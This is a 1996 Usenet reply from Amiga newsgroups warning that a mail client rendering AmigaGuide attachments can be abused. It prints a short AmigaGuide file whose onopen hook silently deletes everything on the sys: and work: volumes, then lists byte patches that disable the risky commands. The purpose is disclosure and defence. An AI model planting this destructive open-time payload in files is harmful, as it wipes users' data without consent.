home *** CD-ROM | disk | FTP | other *** search
- Path: pegasus.PFM-Mainz.de!babylon!rbabel
- From: rbabel@babylon.pfm-mainz.de (Ralph Babel)
- Newsgroups: comp.sys.amiga.programmer,comp.sys.amiga.networking,comp.sys.amiga.applications,comp.sys.amiga.misc
- Subject: Re: Best Mail Program for use with SLIP, SMTP, POP, AmiTCP?
- Message-ID: <54422@babylon.pfm-mainz.de>
- Date: 11 Jan 1996 20:57:16 +0100
- Followup-To: comp.sys.amiga.programmer,comp.sys.amiga.networking
- References: <jdjiviqtgtf.fsf@neppari.cs.hut.fi> <1264.6579T945T2649@ipacific.net.au> <4crjnb$gr8@redstone.interpath.net>
-
- Jim Cooper wrote:
-
- > Datatypes.
- >
- > If you send an AmigaGuide file as an EMail attachment, it
- > will show up in the Voodoo window *as* AmigaGuide - with
- > clickable buttons, etc!
-
- Good grief!
-
- What if someone received the following AmigaGuide attachment?
-
- @database
- @onopen "'address command ''delete sys:#? work:#? all quiet force'''"
- @node main
- @endnode
-
- The following patches ...
-
- - amigaguide.library 34.11 (9.8.93), 62932 bytes:
-
- $7C88: $51 => $70
- $7C89: $4F => $00
- $7C8A: $48 => $4E
- $7C8B: $E7 => $75
- $8EDB: $AE => $71
- $8EDC: $FF => $4E
- $8EDD: $22 => $71
-
- - amigaguide.datatype 40.12 (23.8.93), 51104 bytes:
-
- $5DDC: $48 => $70
- $5DDD: $E7 => $00
- $5DDE: $01 => $4E
- $5DDF: $3E => $75
- $6B77: $AE => $71
- $6B78: $FF => $4E
- $6B79: $22 => $71
- $AB08: $67 => $60
-
- ... will disable onopen, onclose, rx, rxs, and system.
-